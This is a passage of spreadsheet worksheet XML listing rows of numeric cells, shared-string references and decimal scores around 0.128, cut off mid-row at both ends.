        <v>19906.0</v>
      </c>
      <c r="B8366" s="2">
        <v>5.7341752E7</v>
      </c>
      <c r="C8366" s="2" t="s">
        <v>7956</v>
      </c>
      <c r="D8366" s="2">
        <v>1.0</v>
      </c>
      <c r="E8366" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8366" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="8367" ht="15.75" customHeight="1">
      <c r="A8367" s="1">
        <v>33167.0</v>
      </c>
      <c r="B8367" s="2">
        <v>7086085.0</v>
      </c>
      <c r="C8367" s="2" t="s">
        <v>7957</v>
      </c>
      <c r="D8367" s="2">
        <v>1.0</v>
      </c>
      <c r="E8367" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8367" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="8368" ht="15.75" customHeight="1">
      <c r="A8368" s="1">
        <v>33538.0</v>
      </c>
      <c r="B8368" s="2">
        <v>8148794.0</v>
      </c>
      <c r="C8368" s="2" t="s">
        <v>7958</v>
      </c>
      <c r="D8368" s="2">
        <v>1.0</v>
      </c>
      <c r="E8368" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8368" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="8369" ht="15.75" customHeight="1">
      <c r="A8369" s="1">
        <v>33880.0</v>
      </c>
      <c r="B8369" s="2">
        <v>9116544.0</v>
      </c>
      <c r="C8369" s="2" t="s">
        <v>7959</v>
      </c>
      <c r="D8369" s="2">
        <v>1.0</v>
      </c>
      <c r="E8369" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8369" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="8370" ht="15.75" customHeight="1">
      <c r="A8370" s="1">
        <v>6374.0</v>
      </c>
      <c r="B8370" s="2">
        <v>4.8396544E7</v>
      </c>
      <c r="C8370" s="2" t="s">
        <v>7698</v>
      </c>
      <c r="D8370" s="2">
        <v>1.0</v>
      </c>
      <c r="E8370" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8370" s="2">
        <v>0.1293103448275862</v>
      </c>
    </row>
    <row r="8371" ht="15.75" customHeight="1">
      <c r="A8371" s="1">
        <v>9671.0</v>
      </c>
      <c r="B8371" s="2">
        <v>5.632529E7</v>
      </c>
      <c r="C8371" s="2" t="s">
        <v>7960</v>
      </c>
      <c r="D8371" s="2">
        <v>1.0</v>
      </c>
      <c r="E8371" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8371" s="2">
        <v>0.1291079812206573</v>
      </c>
    </row>
    <row r="8372" ht="15.75" customHeight="1">
      <c r="A8372" s="1">
        <v>27375.0</v>
      </c>
      <c r="B8372" s="2">
        <v>2.1692016E7</v>
      </c>
      <c r="C8372" s="2" t="s">
        <v>7961</v>
      </c>
      <c r="D8372" s="2">
        <v>1.0</v>
      </c>
      <c r="E8372" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8372" s="2">
        <v>0.1290018832391714</v>
      </c>
    </row>
    <row r="8373" ht="15.75" customHeight="1">
      <c r="A8373" s="1">
        <v>2111.0</v>
      </c>
      <c r="B8373" s="2">
        <v>3.1356151E7</v>
      </c>
      <c r="C8373" s="2" t="s">
        <v>7962</v>
      </c>
      <c r="D8373" s="2">
        <v>1.0</v>
      </c>
      <c r="E8373" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8373" s="2">
        <v>0.1289308176100629</v>
      </c>
    </row>
    <row r="8374" ht="15.75" customHeight="1">
      <c r="A8374" s="1">
        <v>13235.0</v>
      </c>
      <c r="B8374" s="2">
        <v>3.4253107E7</v>
      </c>
      <c r="C8374" s="2" t="s">
        <v>7963</v>
      </c>
      <c r="D8374" s="2">
        <v>1.0</v>
      </c>
      <c r="E8374" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8374" s="2">
        <v>0.1286149162861492</v>
      </c>
    </row>
    <row r="8375" ht="15.75" customHeight="1">
      <c r="A8375" s="1">
        <v>236.0</v>
      </c>
      <c r="B8375" s="2">
        <v>1.47621E7</v>
      </c>
      <c r="C8375" s="2" t="s">
        <v>7964</v>
      </c>
      <c r="D8375" s="2">
        <v>1.0</v>
      </c>
      <c r="E8375" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8375" s="2">
        <v>0.1286008230452675</v>
      </c>
    </row>
    <row r="8376" ht="15.75" customHeight="1">
      <c r="A8376" s="1">
        <v>13449.0</v>
      </c>
      <c r="B8376" s="2">
        <v>3.5186909E7</v>
      </c>
      <c r="C8376" s="2" t="s">
        <v>7965</v>
      </c>
      <c r="D8376" s="2">
        <v>1.0</v>
      </c>
      <c r="E8376" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8376" s="2">
        <v>0.1286008230452675</v>
      </c>
    </row>
    <row r="8377" ht="15.75" customHeight="1">
      <c r="A8377" s="1">
        <v>2393.0</v>
      </c>
      <c r="B8377" s="2">
        <v>3.335389E7</v>
      </c>
      <c r="C8377" s="2" t="s">
        <v>7966</v>
      </c>
      <c r="D8377" s="2">
        <v>1.0</v>
      </c>
      <c r="E8377" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8377" s="2">
        <v>0.1285240464344942</v>
      </c>
    </row>
    <row r="8378" ht="15.75" customHeight="1">
      <c r="A8378" s="1">
        <v>6016.0</v>
      </c>
      <c r="B8378" s="2">
        <v>4.7477446E7</v>
      </c>
      <c r="C8378" s="2" t="s">
        <v>7967</v>
      </c>
      <c r="D8378" s="2">
        <v>1.0</v>
      </c>
      <c r="E8378" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8378" s="2">
        <v>0.1284153005464481</v>
      </c>
    </row>
    <row r="8379" ht="15.75" customHeight="1">
      <c r="A8379" s="1">
        <v>0.0</v>
      </c>
      <c r="B8379" s="2">
        <v>1.0033715E7</v>
      </c>
      <c r="C8379" s="2" t="s">
        <v>7968</v>
      </c>
      <c r="D8379" s="2">
        <v>1.0</v>
      </c>
      <c r="E8379" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8379" s="2">
        <v>0.1282828282828283</v>
      </c>
    </row>
    <row r="8380" ht="15.75" customHeight="1">
      <c r="A8380" s="1">
        <v>2600.0</v>
      </c>
      <c r="B8380" s="2">
        <v>3.4385625E7</v>
      </c>
      <c r="C8380" s="2" t="s">
        <v>7969</v>
      </c>
      <c r="D8380" s="2">
        <v>1.0</v>
      </c>
      <c r="E8380" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8380" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="8381" ht="15.75" customHeight="1">
      <c r="A8381" s="1">
        <v>16216.0</v>
      </c>
      <c r="B8381" s="2">
        <v>4.570714E7</v>
      </c>
      <c r="C8381" s="2" t="s">
        <v>7970</v>
      </c>
      <c r="D8381" s="2">
        <v>1.0</v>
      </c>
      <c r="E8381" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8381" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="8382" ht="15.75" customHeight="1">
      <c r="A8382" s="1">
        <v>25336.0</v>
      </c>
      <c r="B8382" s="2">
        <v>1.3492325E7</v>
      </c>
      <c r="C8382" s="2" t="s">
        <v>7971</v>
      </c>
      <c r="D8382" s="2">
        <v>1.0</v>
      </c>
      <c r="E8382" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8382" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="8383" ht="15.75" customHeight="1">
      <c r="A8383" s="1">
        <v>59.0</v>
      </c>
      <c r="B8383" s="2">
        <v>1.110691E7</v>
      </c>
      <c r="C8383" s="2" t="s">
        <v>7972</v>
      </c>
      <c r="D8383" s="2">
        <v>1.0</v>
      </c>
      <c r="E8383" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8383" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8384" ht="15.75" customHeight="1">
      <c r="A8384" s="1">
        <v>727.0</v>
      </c>
      <c r="B8384" s="2">
        <v>2.0761026E7</v>
      </c>
      <c r="C8384" s="2" t="s">
        <v>7973</v>
      </c>
      <c r="D8384" s="2">
        <v>1.0</v>
      </c>
      <c r="E8384" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8384" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8385" ht="15.75" customHeight="1">
      <c r="A8385" s="1">
        <v>2219.0</v>
      </c>
      <c r="B8385" s="2">
        <v>3.2157891E7</v>
      </c>
      <c r="C8385" s="2" t="s">
        <v>7974</v>
      </c>
      <c r="D8385" s="2">
        <v>1.0</v>
      </c>
      <c r="E8385" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8385" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8386" ht="15.75" customHeight="1">
      <c r="A8386" s="1">
        <v>2490.0</v>
      </c>
      <c r="B8386" s="2">
        <v>3.3892087E7</v>
      </c>
      <c r="C8386" s="2" t="s">
        <v>7975</v>
      </c>
      <c r="D8386" s="2">
        <v>1.0</v>
      </c>
      <c r="E8386" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8386" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8387" ht="15.75" customHeight="1">
      <c r="A8387" s="1">
        <v>2631.0</v>
      </c>
      <c r="B8387" s="2">
        <v>3.4594587E7</v>
      </c>
      <c r="C8387" s="2" t="s">
        <v>7976</v>
      </c>
      <c r="D8387" s="2">
        <v>1.0</v>
      </c>
      <c r="E8387" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8387" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8388" ht="15.75" customHeight="1">
      <c r="A8388" s="1">
        <v>2697.0</v>
      </c>
      <c r="B8388" s="2">
        <v>3.4850588E7</v>
      </c>
      <c r="C8388" s="2" t="s">
        <v>7977</v>
      </c>
      <c r="D8388" s="2">
        <v>1.0</v>
      </c>
      <c r="E8388" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8388" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8389" ht="15.75" customHeight="1">
      <c r="A8389" s="1">
        <v>3187.0</v>
      </c>
      <c r="B8389" s="2">
        <v>3.7169509E7</v>
      </c>
      <c r="C8389" s="2" t="s">
        <v>7978</v>
      </c>
      <c r="D8389" s="2">
        <v>1.0</v>
      </c>
      <c r="E8389" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8389" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8390" ht="15.75" customHeight="1">
      <c r="A8390" s="1">
        <v>3206.0</v>
      </c>
      <c r="B8390" s="2">
        <v>3.7281637E7</v>
      </c>
      <c r="C8390" s="2" t="s">
        <v>7979</v>
      </c>
      <c r="D8390" s="2">
        <v>1.0</v>
      </c>
      <c r="E8390" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8390" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8391" ht="15.75" customHeight="1">
      <c r="A8391" s="1">
        <v>3341.0</v>
      </c>
      <c r="B8391" s="2">
        <v>3.7721375E7</v>
      </c>
      <c r="C8391" s="2" t="s">
        <v>7980</v>
      </c>
      <c r="D8391" s="2">
        <v>1.0</v>
      </c>
      <c r="E8391" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8391" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8392" ht="15.75" customHeight="1">
      <c r="A8392" s="1">
        <v>3523.0</v>
      </c>
      <c r="B8392" s="2">
        <v>3.8602692E7</v>
      </c>
      <c r="C8392" s="2" t="s">
        <v>7981</v>
      </c>
      <c r="D8392" s="2">
        <v>1.0</v>
      </c>
      <c r="E8392" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8392" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8393" ht="15.75" customHeight="1">
      <c r="A8393" s="1">
        <v>3852.0</v>
      </c>
      <c r="B8393" s="2">
        <v>4.0268647E7</v>
      </c>
      <c r="C8393" s="2" t="s">
        <v>7982</v>
      </c>
      <c r="D8393" s="2">
        <v>1.0</v>
      </c>
      <c r="E8393" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8393" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8394" ht="15.75" customHeight="1">
      <c r="A8394" s="1">
        <v>4668.0</v>
      </c>
      <c r="B8394" s="2">
        <v>4.3146956E7</v>
      </c>
      <c r="C8394" s="2" t="s">
        <v>7983</v>
      </c>
      <c r="D8394" s="2">
        <v>1.0</v>
      </c>
      <c r="E8394" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8394" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8395" ht="15.75" customHeight="1">
      <c r="A8395" s="1">
        <v>4669.0</v>
      </c>
      <c r="B8395" s="2">
        <v>4.3146956E7</v>
      </c>
      <c r="C8395" s="2" t="s">
        <v>7984</v>
      </c>
      <c r="D8395" s="2">
        <v>1.0</v>
      </c>
      <c r="E8395" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8395" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8396" ht="15.75" customHeight="1">
      <c r="A8396" s="1">
        <v>5207.0</v>
      </c>
      <c r="B8396" s="2">
        <v>4.4928754E7</v>
      </c>
      <c r="C8396" s="2" t="s">
        <v>7985</v>
      </c>
      <c r="D8396" s="2">
        <v>1.0</v>
      </c>
      <c r="E8396" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8396" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8397" ht="15.75" customHeight="1">
      <c r="A8397" s="1">
        <v>5275.0</v>
      </c>
      <c r="B8397" s="2">
        <v>4.5158837E7</v>
      </c>
      <c r="C8397" s="2" t="s">
        <v>7986</v>
      </c>
      <c r="D8397" s="2">
        <v>1.0</v>
      </c>
      <c r="E8397" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8397" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8398" ht="15.75" customHeight="1">
      <c r="A8398" s="1">
        <v>6385.0</v>
      </c>
      <c r="B8398" s="2">
        <v>4.8422174E7</v>
      </c>
      <c r="C8398" s="2" t="s">
        <v>7987</v>
      </c>
      <c r="D8398" s="2">
        <v>1.0</v>
      </c>
      <c r="E8398" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8398" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8399" ht="15.75" customHeight="1">
      <c r="A8399" s="1">
        <v>8195.0</v>
      </c>
      <c r="B8399" s="2">
        <v>5.3253854E7</v>
      </c>
      <c r="C8399" s="2" t="s">
        <v>7988</v>
      </c>
      <c r="D8399" s="2">
        <v>1.0</v>
      </c>
      <c r="E8399" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8399" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8400" ht="15.75" customHeight="1">
      <c r="A8400" s="1">
        <v>8425.0</v>
      </c>
      <c r="B8400" s="2">
        <v>5.392953E7</v>
      </c>
      <c r="C8400" s="2" t="s">
        <v>7989</v>
      </c>
      <c r="D8400" s="2">
        <v>1.0</v>
      </c>
      <c r="E8400" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8400" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8401" ht="15.75" customHeight="1">
      <c r="A8401" s="1">
        <v>8519.0</v>
      </c>
      <c r="B8401" s="2">
        <v>5.4084208E7</v>
      </c>
      <c r="C8401" s="2" t="s">
        <v>7990</v>
      </c>
      <c r="D8401" s="2">
        <v>1.0</v>
      </c>
      <c r="E8401" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8401" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8402" ht="15.75" customHeight="1">
      <c r="A8402" s="1">
        <v>8798.0</v>
      </c>
      <c r="B8402" s="2">
        <v>5.4607524E7</v>
      </c>
      <c r="C8402" s="2" t="s">
        <v>7991</v>
      </c>
      <c r="D8402" s="2">
        <v>1.0</v>
      </c>
      <c r="E8402" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8402" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8403" ht="15.75" customHeight="1">
      <c r="A8403" s="1">
        <v>9697.0</v>
      </c>
      <c r="B8403" s="2">
        <v>5.6367659E7</v>
      </c>
      <c r="C8403" s="2" t="s">
        <v>7992</v>
      </c>
      <c r="D8403" s="2">
        <v>1.0</v>
      </c>
      <c r="E8403" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8403" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8404" ht="15.75" customHeight="1">
      <c r="A8404" s="1">
        <v>10137.0</v>
      </c>
      <c r="B8404" s="2">
        <v>5.7302655E7</v>
      </c>
      <c r="C8404" s="2" t="s">
        <v>7993</v>
      </c>
      <c r="D8404" s="2">
        <v>1.0</v>
      </c>
      <c r="E8404" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8404" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8405" ht="15.75" customHeight="1">
      <c r="A8405" s="1">
        <v>10300.0</v>
      </c>
      <c r="B8405" s="2">
        <v>5.7667674E7</v>
      </c>
      <c r="C8405" s="2" t="s">
        <v>7994</v>
      </c>
      <c r="D8405" s="2">
        <v>1.0</v>
      </c>
      <c r="E8405" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8405" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8406" ht="15.75" customHeight="1">
      <c r="A8406" s="1">
        <v>10649.0</v>
      </c>
      <c r="B8406" s="2">
        <v>1.4148418E7</v>
      </c>
      <c r="C8406" s="2" t="s">
        <v>7995</v>
      </c>
      <c r="D8406" s="2">
        <v>1.0</v>
      </c>
      <c r="E8406" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8406" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8407" ht="15.75" customHeight="1">
      <c r="A8407" s="1">
        <v>10863.0</v>
      </c>
      <c r="B8407" s="2">
        <v>1.6369316E7</v>
      </c>
      <c r="C8407" s="2" t="s">
        <v>7996</v>
      </c>
      <c r="D8407" s="2">
        <v>1.0</v>
      </c>
      <c r="E8407" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8407" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8408" ht="15.75" customHeight="1">
      <c r="A8408" s="1">
        <v>12594.0</v>
      </c>
      <c r="B8408" s="2">
        <v>3.0070618E7</v>
      </c>
      <c r="C8408" s="2" t="s">
        <v>7997</v>
      </c>
      <c r="D8408" s="2">
        <v>1.0</v>
      </c>
      <c r="E8408" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8408" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8409" ht="15.75" customHeight="1">
      <c r="A8409" s="1">
        <v>12659.0</v>
      </c>
      <c r="B8409" s="2">
        <v>3.0485947E7</v>
      </c>
      <c r="C8409" s="2" t="s">
        <v>7998</v>
      </c>
      <c r="D8409" s="2">
        <v>1.0</v>
      </c>
      <c r="E8409" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8409" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8410" ht="15.75" customHeight="1">
      <c r="A8410" s="1">
        <v>12860.0</v>
      </c>
      <c r="B8410" s="2">
        <v>3.1870637E7</v>
      </c>
      <c r="C8410" s="2" t="s">
        <v>7999</v>
      </c>
      <c r="D8410" s="2">
        <v>1.0</v>
      </c>
      <c r="E8410" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8410" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8411" ht="15.75" customHeight="1">
      <c r="A8411" s="1">
        <v>13472.0</v>
      </c>
      <c r="B8411" s="2">
        <v>3.5259791E7</v>
      </c>
      <c r="C8411" s="2" t="s">
        <v>8000</v>
      </c>
      <c r="D8411" s="2">
        <v>1.0</v>
      </c>
      <c r="E8411" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8411" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8412" ht="15.75" customHeight="1">
      <c r="A8412" s="1">
        <v>14250.0</v>
      </c>
      <c r="B8412" s="2">
        <v>3.8364597E7</v>
      </c>
      <c r="C8412" s="2" t="s">
        <v>8001</v>
      </c>
      <c r="D8412" s="2">
        <v>1.0</v>
      </c>
      <c r="E8412" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8412" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8413" ht="15.75" customHeight="1">
      <c r="A8413" s="1">
        <v>16135.0</v>
      </c>
      <c r="B8413" s="2">
        <v>4.5528409E7</v>
      </c>
      <c r="C8413" s="2" t="s">
        <v>8002</v>
      </c>
      <c r="D8413" s="2">
        <v>1.0</v>
      </c>
      <c r="E8413" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8413" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8414" ht="15.75" customHeight="1">
      <c r="A8414" s="1">
        <v>16308.0</v>
      </c>
      <c r="B8414" s="2">
        <v>4.5939828E7</v>
      </c>
      <c r="C8414" s="2" t="s">
        <v>8003</v>
      </c>
      <c r="D8414" s="2">
        <v>1.0</v>
      </c>
      <c r="E8414" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8414" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8415" ht="15.75" customHeight="1">
      <c r="A8415" s="1">
        <v>16442.0</v>
      </c>
      <c r="B8415" s="2">
        <v>4.6383901E7</v>
      </c>
      <c r="C8415" s="2" t="s">
        <v>8004</v>
      </c>
      <c r="D8415" s="2">
        <v>1.0</v>
      </c>
      <c r="E8415" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8415" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8416" ht="15.75" customHeight="1">
      <c r="A8416" s="1">
        <v>16743.0</v>
      </c>
      <c r="B8416" s="2">
        <v>4.7555859E7</v>
      </c>
      <c r="C8416" s="2" t="s">
        <v>8005</v>
      </c>
      <c r="D8416" s="2">
        <v>1.0</v>
      </c>
      <c r="E8416" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8416" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8417" ht="15.75" customHeight="1">
      <c r="A8417" s="1">
        <v>17118.0</v>
      </c>
      <c r="B8417" s="2">
        <v>4.8768194E7</v>
      </c>
      <c r="C8417" s="2" t="s">
        <v>8006</v>
      </c>
      <c r="D8417" s="2">
        <v>1.0</v>
      </c>
      <c r="E8417" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8417" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8418" ht="15.75" customHeight="1">
      <c r="A8418" s="1">
        <v>17258.0</v>
      </c>
      <c r="B8418" s="2">
        <v>4.9137035E7</v>
      </c>
      <c r="C8418" s="2" t="s">
        <v>8007</v>
      </c>
      <c r="D8418" s="2">
        <v>1.0</v>
      </c>
      <c r="E8418" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8418" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8419" ht="15.75" customHeight="1">
      <c r="A8419" s="1">
        <v>17562.0</v>
      </c>
      <c r="B8419" s="2">
        <v>5.0230454E7</v>
      </c>
      <c r="C8419" s="2" t="s">
        <v>8008</v>
      </c>
      <c r="D8419" s="2">
        <v>1.0</v>
      </c>
      <c r="E8419" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8419" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8420" ht="15.75" customHeight="1">
      <c r="A8420" s="1">
        <v>17635.0</v>
      </c>
      <c r="B8420" s="2">
        <v>5.0389556E7</v>
      </c>
      <c r="C8420" s="2" t="s">
        <v>8009</v>
      </c>
      <c r="D8420" s="2">
        <v>1.0</v>
      </c>
      <c r="E8420" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8420" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8421" ht="15.75" customHeight="1">
      <c r="A8421" s="1">
        <v>19800.0</v>
      </c>
      <c r="B8421" s="2">
        <v>5.6858492E7</v>
      </c>
      <c r="C8421" s="2" t="s">
        <v>8010</v>
      </c>
      <c r="D8421" s="2">
        <v>1.0</v>
      </c>
      <c r="E8421" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8421" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8422" ht="15.75" customHeight="1">
      <c r="A8422" s="1">
        <v>19909.0</v>
      </c>
      <c r="B8422" s="2">
        <v>5.7346248E7</v>
      </c>
      <c r="C8422" s="2" t="s">
        <v>8011</v>
      </c>
      <c r="D8422" s="2">
        <v>1.0</v>
      </c>
      <c r="E8422" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8422" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8423" ht="15.75" customHeight="1">
      <c r="A8423" s="1">
        <v>20071.0</v>
      </c>
      <c r="B8423" s="2">
        <v>8835782.0</v>
      </c>
      <c r="C8423" s="2" t="s">
        <v>8012</v>
      </c>
      <c r="D8423" s="2">
        <v>1.0</v>
      </c>
      <c r="E8423" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8423" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8424" ht="15.75" customHeight="1">
      <c r="A8424" s="1">
        <v>20195.0</v>
      </c>
      <c r="B8424" s="2">
        <v>1.0545919E7</v>
      </c>
      <c r="C8424" s="2" t="s">
        <v>8013</v>
      </c>
      <c r="D8424" s="2">
        <v>1.0</v>
      </c>
      <c r="E8424" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8424" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8425" ht="15.75" customHeight="1">
      <c r="A8425" s="1">
        <v>20849.0</v>
      </c>
      <c r="B8425" s="2">
        <v>1.5699041E7</v>
      </c>
      <c r="C8425" s="2" t="s">
        <v>8014</v>
      </c>
      <c r="D8425" s="2">
        <v>1.0</v>
      </c>
      <c r="E8425" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8425" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8426" ht="15.75" customHeight="1">
      <c r="A8426" s="1">
        <v>21210.0</v>
      </c>
      <c r="B8426" s="2">
        <v>1.9571696E7</v>
      </c>
      <c r="C8426" s="2" t="s">
        <v>8015</v>
      </c>
      <c r="D8426" s="2">
        <v>1.0</v>
      </c>
      <c r="E8426" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8426" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8427" ht="15.75" customHeight="1">
      <c r="A8427" s="1">
        <v>21511.0</v>
      </c>
      <c r="B8427" s="2">
        <v>2.3153601E7</v>
      </c>
      <c r="C8427" s="2" t="s">
        <v>8016</v>
      </c>
      <c r="D8427" s="2">
        <v>1.0</v>
      </c>
      <c r="E8427" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8427" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8428" ht="15.75" customHeight="1">
      <c r="A8428" s="1">
        <v>23092.0</v>
      </c>
      <c r="B8428" s="2">
        <v>5070736.0</v>
      </c>
      <c r="C8428" s="2" t="s">
        <v>8017</v>
      </c>
      <c r="D8428" s="2">
        <v>1.0</v>
      </c>
      <c r="E8428" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8428" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8429" ht="15.75" customHeight="1">
      <c r="A8429" s="1">
        <v>24990.0</v>
      </c>
      <c r="B8429" s="2">
        <v>1.2686128E7</v>
      </c>
      <c r="C8429" s="2" t="s">
        <v>8018</v>
      </c>
      <c r="D8429" s="2">
        <v>1.0</v>
      </c>
      <c r="E8429" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8429" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8430" ht="15.75" customHeight="1">
      <c r="A8430" s="1">
        <v>26513.0</v>
      </c>
      <c r="B8430" s="2">
        <v>1.7618759E7</v>
      </c>
      <c r="C8430" s="2" t="s">
        <v>8019</v>
      </c>
      <c r="D8430" s="2">
        <v>1.0</v>
      </c>
      <c r="E8430" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8430" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8431" ht="15.75" customHeight="1">
      <c r="A8431" s="1">
        <v>26761.0</v>
      </c>
      <c r="B8431" s="2">
        <v>1.8450483E7</v>
      </c>
      <c r="C8431" s="2" t="s">
        <v>8020</v>
      </c>
      <c r="D8431" s="2">
        <v>1.0</v>
      </c>
      <c r="E8431" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8431" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8432" ht="15.75" customHeight="1">
      <c r="A8432" s="1">
        <v>28721.0</v>
      </c>
      <c r="B8432" s="2">
        <v>2.7915651E7</v>
      </c>
      <c r="C8432" s="2" t="s">
        <v>8021</v>
      </c>
      <c r="D8432" s="2">
        <v>1.0</v>
      </c>
      <c r="E8432" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8432" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8433" ht="15.75" customHeight="1">
      <c r="A8433" s="1">
        <v>30652.0</v>
